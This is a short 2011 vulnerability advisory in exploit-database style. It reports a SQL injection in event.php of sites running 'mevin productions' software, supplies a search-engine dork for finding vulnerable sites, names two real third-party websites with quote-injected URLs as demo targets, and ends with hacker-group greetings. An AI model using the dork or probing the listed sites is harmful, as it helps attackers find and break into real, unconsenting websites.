Sites powered by Melvin Productions suffer from a remote SQL injection vulnerability.
c1660a5be7b456bfb32c157e6e63701e653bc58adfda0bf52c74c22aff23b808
# Exploit Title: mevin productions Sql Injection Vulnerability
# Date: 30/10/2011 - 23:00
# Author: 3spi0n
# Software Website: http://www.mevin.com/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File: Event.php
[$] Dorks: "Powered by: mevin productions" inurl:/event.php?id=
[$] Demo Sites:
[~] http://www.mhsbb.com/events/event.php?id=96" [PhpSQLi]
[~] http://www.timewarpband.co.uk/events/event.php?id=24" [PhpSQLi]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Http://3spi0n.Net/
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>